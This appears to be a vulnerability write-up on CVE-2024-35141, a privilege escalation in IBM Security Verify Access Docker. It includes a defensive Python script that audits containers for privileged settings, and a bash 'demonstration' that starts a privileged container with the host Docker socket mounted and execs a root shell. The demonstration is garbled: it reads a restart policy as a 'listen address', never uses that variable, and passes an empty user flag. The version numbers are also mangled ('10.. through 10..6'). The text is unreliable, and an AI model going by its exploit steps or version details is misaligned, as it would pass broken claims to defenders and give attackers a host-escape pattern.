A vulnerability has been identified in IBM Security Verify Access Docker versions 10.. through 10..6. The vulnerability, tracked as CVE-2024-35141, allows a local user to escalate their privileges due to the execution of unnecessary privileges. IBM has acknowledged the vulnerability and has released patches to address the issue.

Vulnerability Details

CVE-2024-35141 affects IBM Security Verify Access Docker. The vulnerability allows a local attacker to gain unauthorized access to the system and perform malicious activities. This is possible because of a misconfigured Docker container that grants unnecessary privileges to certain users.

This privilege escalation vulnerability could lead to unauthorized access to sensitive data, bypass of security controls, and the potential to execute arbitrary code on the vulnerable system.
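As an added defender-side example (not code from the page or from IBM), the following audit script reads `docker inspect` output and flags the kind of unnecessary privileges the advisory describes: `--privileged`, added Linux capabilities, a bind-mounted host Docker socket, and a process running as root. The embedded JSON is a constructed sample in the shape of `docker inspect` output, used when no Docker daemon is reachable; the container name is taken from the page.

```python
import json
import subprocess
from typing import Any

# Constructed sample in the shape of `docker inspect <name>` output (not real data).
SAMPLE_INSPECT = json.dumps([{
    "Name": "/ibm-security-verify-access",
    "Config": {"User": ""},
    "HostConfig": {
        "Privileged": True,
        "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
        "CapAdd": ["SYS_ADMIN"],
    },
    "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                "Destination": "/var/run/docker.sock"}],
}])


def audit_container(entry: dict[str, Any]) -> list[str]:
    """Return the risky settings found in one `docker inspect` entry."""
    findings = []
    host = entry.get("HostConfig", {})
    if host.get("Privileged"):
        findings.append("runs with --privileged")
    for cap in host.get("CapAdd") or []:
        findings.append(f"adds Linux capability {cap}")
    # Bind sources appear both in Mounts and in HostConfig.Binds ("src:dst[:opts]").
    sources = {m.get("Source") for m in entry.get("Mounts", [])}
    sources.update(b.split(":")[0] for b in host.get("Binds") or [])
    if "/var/run/docker.sock" in sources:
        findings.append("mounts the host Docker socket (equivalent to host root)")
    user = entry.get("Config", {}).get("User") or ""
    if user in ("", "0", "root") or user.startswith(("0:", "root:")):
        findings.append("process runs as root (no non-root User set)")
    return findings


def audit_all(inspect_json: str) -> dict[str, list[str]]:
    """Map each container name to its findings."""
    return {e.get("Name", "?").lstrip("/"): audit_container(e)
            for e in json.loads(inspect_json)}


def inspect_running() -> str:
    """Return `docker inspect` JSON for running containers, or the sample if Docker is unavailable."""
    try:
        run = lambda *a: subprocess.run(a, capture_output=True, text=True, check=True).stdout
        ids = run("docker", "ps", "-q").split()
        return run("docker", "inspect", *ids) if ids else "[]"
    except (OSError, subprocess.CalledProcessError):
        return SAMPLE_INSPECT


if __name__ == "__main__":
    for name, findings in audit_all(inspect_running()).items():
        print(name, "->", "; ".join(findings) or "no findings")
```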

Affected Versions

IBM Security Verify Access Docker 10.. through 10..6

The following code snippet demonstrates the vulnerability in the affected versions:

```bash
# Get the LISTEN address of the privileged socket
LISTEN_ADDR=$(docker inspect --format "{{ .HostConfig.RestartPolicy }}" ibm-security-verify-access)

# Start a new container with access to the privileged socket
docker run -it --privileged -v /var/run/docker.sock:/var/run/docker.sock ibm-security-verify-access /bin/bash

# Obtain root access
docker exec -u  -it ibm-security-verify-access /bin/bash
```

Upon executing the above code snippet, the attacker gains root access inside the affected IBM Security Verify Access Docker container.

Mitigation and Remediation

IBM has released a patch for the affected versions. It is highly recommended that users upgrade their IBM Security Verify Access Docker to the latest version (10..7 or later) to mitigate the vulnerability.

To update IBM Security Verify Access Docker, follow these steps:

1. Download the latest version (10..7 or later) from the official IBM website: IBM Security Verify Access Docker Download

```bash
docker load -i /path/to/downloaded/ibm-security-verify-access.tar.gz
```

Original References

IBM Security Bulletin: CVE-2024-35141
NIST National Vulnerability Database: CVE-2024-35141

Conclusion

CVE-2024-35141 is a critical privilege escalation vulnerability affecting IBM Security Verify Access Docker versions 10.. through 10..6. Immediate action is required to mitigate the risk associated with this vulnerability. Users should upgrade their IBM Security Verify Access Docker to version 10..7 or later to avoid potential security breaches.

Timeline

Published on: 12/19/2024 02:15:22 UTC